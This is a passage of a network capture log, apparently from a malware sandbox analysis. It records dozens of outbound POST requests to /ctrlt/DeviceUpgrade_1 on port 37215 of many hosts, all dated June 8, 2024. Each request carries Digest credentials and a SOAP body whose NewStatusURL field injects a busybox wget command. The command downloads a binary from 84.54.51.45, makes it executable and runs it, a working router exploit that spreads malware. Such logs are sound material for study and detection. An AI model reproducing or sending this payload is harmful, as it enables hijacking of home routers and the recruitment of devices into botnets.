78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1689192.168.2.1559368197.92.233.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461934090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1690192.168.2.1542380197.171.147.20137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461976051 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1691192.168.2.1532848197.150.186.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.461987972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1692192.168.2.1553248197.96.202.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462004900 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1693192.168.2.1538358197.99.92.23337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462061882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1694192.168.2.1558152197.212.12.5737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462061882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1695192.168.2.1545894197.91.39.8737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462100029 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1696192.168.2.1536824197.191.86.19837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462100983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1697192.168.2.1548822197.113.50.5437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462101936 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1698192.168.2.1541216197.176.171.13737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462105989 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1699192.168.2.1534458197.37.72.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:15.462127924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
